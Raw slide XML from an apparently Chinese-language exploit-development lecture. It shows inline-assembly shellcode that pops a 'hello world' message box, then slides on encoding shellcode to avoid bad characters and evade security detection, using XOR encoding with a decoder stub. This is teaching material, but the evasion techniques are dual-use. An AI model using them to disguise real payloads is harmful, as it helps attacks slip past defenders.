        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>char*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[]){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LoadLibrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"user32.dll"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>_asm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xor ebx,ebx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>push ebx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x20646C72</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x6F77206F</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x6C6C6568</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov eax, esp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>push ebx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>push eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>push eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>push ebx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov eax, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x7E4507EA</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>call eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AF00DB"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AF00DB"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D5AC760-F934-4127-1D81-D29CC2F1B0F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="2327719"/>
            <a:ext cx="4824536" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C272337A-2705-501F-15C3-B096B2CB69B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1199456" y="4293096"/>
            <a:ext cx="4105097" cy="1855643"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="310029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766765" y="1062089"/>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CD921F3C-4A8D-E4CA-CB27-28E0F9238772}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="905319" y="1706792"/>
            <a:ext cx="4824536" cy="3834511"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>编制过程中通常需要进行编码。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>字符集的差异。</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应用程序应用平台的不同，可能的字符集会有差异，限制</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exploit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的稳定性。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>绕过坏字符。</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针对某个应用，可能对某些坏字符变形或者截断而破坏</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exploit</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比如</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strcpy</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函数对</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NULL</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字符的不可接纳性，再比如很多应用在某些处理流程中可能会限制</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x0D</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\r</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0x0A</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\n</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或者</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x20</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="e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空格）字符。</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Font typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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绕过安全防护检测。有很多安全检测工具是根据漏洞相应的</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exploit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脚本特征做的检测，所以变形</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exploit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在一定程度上可以“免杀”。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="16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87D5B935-6EF9-D53B-877D-576B1A18AA98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="1148820"/>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必要性</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98099D6E-4FA8-985F-ABE1-8594714FD671}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6315350" y="1052513"/>
            <a:ext cx="5113336"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40008783-1B3F-49C9-5DDE-DEC8902CA017}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384032" y="1122171"/>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编码方法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACD61008-3DEB-E6A2-6EA9-0B8B2DAD24C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384031" y="1706792"/>
            <a:ext cx="4968553" cy="2641877"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>对于二进制</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>机器代码的编码，通常采用类似“加壳”思想的手段。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:prstClr>
              </a:solidFill>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自定义编码的方法完成</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的编码。</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AutoNum type="arabicPeriod"/>
            </a:pP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342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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通过精心构造精简干练的解码程序，放在</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开始执行的地方，完成</a:t>
            </a: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的编解码。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="412302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 S</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>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467398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801055"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异或编码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801055" y="1690708"/>
            <a:ext cx="4536504" cy="1445717"/>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异或编码是一种简单易用的</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编码方法，它的编解码程序非常简单。但是，它也存在很多限制，比如在选取编码字节时，不可与已有字节相同，否则会出现</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5663952" y="1058913"/>
            <a:ext cx="5761286"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5663952"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编码程序</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A3CBDEB-575B-00AE-A610-AD66DE4EF034}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5663952" y="1700647"/>
            <a:ext cx="5878512" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>void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encoder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input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unsigned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1080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>key</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len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
